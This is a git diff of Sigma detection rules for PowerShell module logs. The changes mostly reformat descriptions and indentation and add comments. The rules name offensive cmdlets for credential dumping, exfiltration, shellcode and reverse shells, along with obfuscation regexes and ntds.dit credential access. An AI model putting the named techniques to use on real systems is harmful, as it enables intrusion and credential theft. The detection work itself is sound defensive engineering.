https://github.com/HarmJ0y/DAMP - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ @@ -267,7 +266,7 @@ detection: - WSUSpendu.ps1 selection_invoke_sharp: ContextInfo|contains|all: - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - .ps1 condition: ps_module and (1 of selection_*) falsepositives: diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml b/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml index 56b40873f..501498ff1 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml @@ -1,9 +1,7 @@ title: Suspicious Get-ADDBAccount Usage id: b140afd9-474b-4072-958e-2ebb435abd68 status: test -description: Detects suspicious invocation of the Get-ADDBAccount script that reads - from a ntds.dit file and may be used to get access to credentials without using - any credential dumpers +description: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers references: - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml b/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml index 258e0ff51..908ee56ea 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml @@ -1,8 +1,7 @@ title: PowerShell Get Clipboard id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 status: test -description: A General detection for the Get-Clipboard commands in PowerShell logs. - This could be an adversary capturing clipboard contents. +description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/16 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml index 6065475e9..e45918c87 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation CLIP+ Launcher - PowerShell Module id: a136cde0-61ad-4a61-9b82-8dc490e60dd2 related: - - id: 73e67340-0d25-11eb-adc1-0242ac120002 - type: derived + - id: 73e67340-0d25-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml index 2db20a62c..a28c41132 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml @@ -1,12 +1,10 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module id: 2f211361-7dce-442d-b78a-c04039677378 related: - - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 - type: derived + - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 + type: derived status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the code block cited in the reference section - below +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -28,13 +26,13 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_payload: - - Payload|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - Payload|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - Payload|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - Payload|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - Payload|re: \*mdr\*\W\s*\)\.Name - - Payload|re: \$VerbosePreference\.ToString\( - - Payload|re: \[String\]\s*\$VerbosePreference + - Payload|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - Payload|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - Payload|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - Payload|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - Payload|re: \*mdr\*\W\s*\)\.Name + - Payload|re: \$VerbosePreference\.ToString\( + - Payload|re: \[String\]\s*\$VerbosePreference condition: ps_module and selection_payload falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml index efa16acc3..e10c3e6b7 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation STDIN+ Launcher - PowerShell Module id: 9ac8b09b-45de-4a07-9da1-0de8c09304a3 related: - - id: 779c8c12-0eb1-11eb-adc1-0242ac120002 - type: derived + - id: 779c8c12-0eb1-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml index 1f11a528a..0a9fe2ae1 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR+ Launcher - PowerShell Module id: 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e related: - - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 - type: derived + - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml index 8053cd190..a048f04ec 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module id: 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1 related: - - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 - type: derived + - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 + type: derived status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml index 5a123b659..2807a53c0 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module id: a23791fe-8846-485a-b16b-ca691e1b03d4 related: - - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 - type: derived + - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 + type: derived status: test description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml index ebc5d4b43..398130775 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Stdin - PowerShell Module id: c72aca44-8d52-45ad-8f81-f96c4d3c755e related: - - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 - type: derived + - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 + type: derived status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml index 098618cce..bcbbdf95c 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use Clip - PowerShell Module id: ebdf49d8-b89c-46c9-8fdf-2c308406f6bd related: - - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 - type: derived + - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 + type: derived status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml index 779e3f73f..2e3e2cb85 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use MSHTA - PowerShell Module id: 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb related: - - id: e55a5195-4724-480e-a77e-3ebe64bd3759 - type: derived + - id: e55a5195-4724-480e-a77e-3ebe64bd3759 + type: derived status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/08 modified: 2023/01/04 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml index 052b8742a..ccacd67e5 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml @@ -1,8 +1,8 @@ title: Invoke-Obfuscation Via Use Rundll32 - PowerShell Module id: 88a22f69-62f9-4b8a-aa00-6b0212f2f05a related: - - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b - type: derived + - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b + type: derived status: test description: Detects Obfuscated Powershell via use Rundll32 in Scripts references: diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml index 0c50772a7..a51c4915b 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module id: f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6 related: - - id: e54f5149-6ba3-49cf-b153-070d24679126 - type: derived + - id: e54f5149-6ba3-49cf-b153-070d24679126 + type: derived status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/12/02 @@ -26,7 +26,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_4103: - Payload|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c + Payload|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c # FPs with |\/r condition: ps_module and selection_4103 falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml index 23b5fcdab..51148f7e8 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml @@ -1,10 +1,10 @@ title: Malicious PowerShell Commandlets - PoshModule id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c related: - - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - type: similar - - id: 02030f2f-6199-49ec-b258-ea71b07e03dc - type: similar + - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + type: similar + - id: 02030f2f-6199-49ec-b258-ea71b07e03dc + type: similar status: test description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: @@ -14,9 +14,9 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP @@ -52,6 +52,7 @@ detection: - PowerShellCore/Operational selection: Payload|contains: + # Note: Please ensure alphabetical order when adding new entries - Add-Exfiltration - Add-Persistence - Add-RegBackdoor @@ -67,16 +68,16 @@ detection: - Enable-MachineAccount - Enabled-DuplicateToken - Exploit-Jboss - - Export-ADR - - Export-ADRCSV - - Export-ADRExcel - - Export-ADRHTML - - Export-ADRJSON - - Export-ADRXML + - Export-ADR # # ADRecon related cmdlets + - Export-ADRCSV # # ADRecon related cmdlets + - Export-ADRExcel # # ADRecon related cmdlets + - Export-ADRHTML # # ADRecon related cmdlets + - Export-ADRJSON # # ADRecon related cmdlets + - Export-ADRXML # # ADRecon related cmdlets - Find-Fruit - Find-GPOLocation - Find-TrustedDocuments - - Get-ADIDNS + - Get-ADIDNS # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone - Get-ApplicationHost - Get-ChromeDump - Get-ClipboardContents @@ -118,7 +119,7 @@ detection: - Install-ServiceBinary - Install-SSP - Invoke-ACLScanner - - Invoke-ADRecon + - Invoke-ADRecon # # ADRecon related cmdlets - Invoke-ADSBackdoor - Invoke-AgentSmith - Invoke-AllChecks @@ -145,7 +146,7 @@ detection: - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem @@ -169,7 +170,7 @@ detection: - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP @@ -188,7 +189,7 @@ detection: - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler @@ -234,7 +235,7 @@ detection: - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Set-MacAttribute - Set-MachineAccountAttribute - Set-Wallpaper diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml b/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml index 9e2f983d8..c4621e16c 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml @@ -24,8 +24,8 @@ detection: - PowerShellCore/Operational selection: ContextInfo|contains|all: - - ' = ServerRemoteHost ' - - wsmprovhost.exe + - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte = + - wsmprovhost.exe # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = filter_pwsh_archive: ContextInfo|contains: \Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psm1 condition: ps_module and (selection and not 1 of filter_*) diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml b/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml index 95ff09534..5421004ab 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml @@ -1,17 +1,14 @@ title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module id: 38a7625e-b2cb-485d-b83d-aff137d859f4 related: - - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 - type: similar - - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 - type: similar - - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 - type: similar + - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation + type: similar + - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic + type: similar + - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock + type: similar status: experimental -description: Detects PowerShell module creation where the module Contents are set - to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential - abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable - to module load-order hijacking. +description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 @@ -32,8 +29,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: - Payload|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter - { + Payload|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter { condition: ps_module and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml index 465e66863..c8ca4fe5f 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml @@ -1,15 +1,10 @@ title: AD Groups Or Users Enumeration Using PowerShell - PoshModule id: 815bfc17-7fc6-4908-a55e-2f37b98cedb4 status: test -description: 'Adversaries may attempt to find domain-level groups and permission settings. - - The knowledge of domain-level permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as domain administrators. - - ' +description: | + Adversaries may attempt to find domain-level groups and permission settings. + The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md author: frack113 @@ -29,19 +24,19 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_ad_principal: - - Payload|contains: get-ADPrincipalGroupMembership - - ContextInfo|contains: get-ADPrincipalGroupMembership + - Payload|contains: get-ADPrincipalGroupMembership + - ContextInfo|contains: get-ADPrincipalGroupMembership selection_get_aduser: - - Payload|contains|all: - - get-aduser - - '-f ' - - '-pr ' - - DoesNotRequirePreAuth - - ContextInfo|contains|all: - - get-aduser - - '-f ' - - '-pr ' - - DoesNotRequirePreAuth + - Payload|contains|all: + - get-aduser + - '-f ' + - '-pr ' + - DoesNotRequirePreAuth + - ContextInfo|contains|all: + - get-aduser + - '-f ' + - '-pr ' + - DoesNotRequirePreAuth condition: ps_module and (1 of selection_*) falsepositives: - Administrator script diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml index 981149c3e..6496e58fd 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Download - PoshModule id: de41232e-12e8-49fa-86bc-c05c7e722df9 related: - - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 - type: derived + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived status: test description: Detects suspicious PowerShell download command author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml index 9d04e9c67..2dae1dde9 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml @@ -1,9 +1,7 @@ title: Use Get-NetTCPConnection - PowerShell Module id: aff815cc-e400-4bf0-a47a-5d8a2407d4e1 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell author: frack113 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml index 5922cabd9..bac07f52d 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml @@ -1,10 +1,10 @@ title: Suspicious PowerShell Invocations - Generic - PowerShell Module id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 related: - - id: 3d304fda-78aa-43ed-975c-d740798a49c1 - type: derived - - id: ed965133-513f-41d9-a441-e38076a0798f - type: similar + - id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived + - id: ed965133-513f-41d9-a441-e38076a0798f + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml index f95400b50..b95abf358 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml @@ -1,12 +1,12 @@ title: Suspicious PowerShell Invocations - Specific - PowerShell Module id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 related: - - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c - type: derived - - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 - type: similar - - id: 536e2947-3729-478c-9903-745aaffe60d2 - type: similar + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived + - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 + type: similar + - id: 536e2947-3729-478c-9903-745aaffe60d2 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml index a6f6062e3..0f07fd72a 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml @@ -1,15 +1,10 @@ title: Suspicious Get Local Groups Information id: cef24b90-dddc-4ae1-a09a-8764872f69fc status: test -description: 'Adversaries may attempt to find local system groups and permission settings. - - The knowledge of local system permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as the users found within the local administrators group. - - ' +description: | + Adversaries may attempt to find local system groups and permission settings. + The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: frack113 @@ -29,19 +24,19 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational test_3: - - Payload|contains: - - get-localgroup - - Get-LocalGroupMember - - ContextInfo|contains: - - get-localgroup - - Get-LocalGroupMember + - Payload|contains: + - get-localgroup + - Get-LocalGroupMember + - ContextInfo|contains: + - get-localgroup + - Get-LocalGroupMember test_6: - - Payload|contains|all: - - Get-WMIObject - - Win32_Group - - ContextInfo|contains|all: - - Get-WMIObject - - Win32_Group + - Payload|contains|all: + - Get-WMIObject + - Win32_Group + - ContextInfo|contains|all: + - Get-WMIObject + - Win32_Group condition: ps_module and (1 of test_*) falsepositives: - Administrator script diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml index 66fb8bdc1..4701240b5 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml @@ -1,13 +1,9 @@ title: Suspicious Computer Machine Password by PowerShell id: e3818659-5016-4811-a73c-dde4679169d2 status: test -description: 'The Reset-ComputerMachinePassword cmdlet changes the computer account - password that the computers use to authenticate to the domain controllers in the - domain. - +description: | + The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer. - - ' references: - 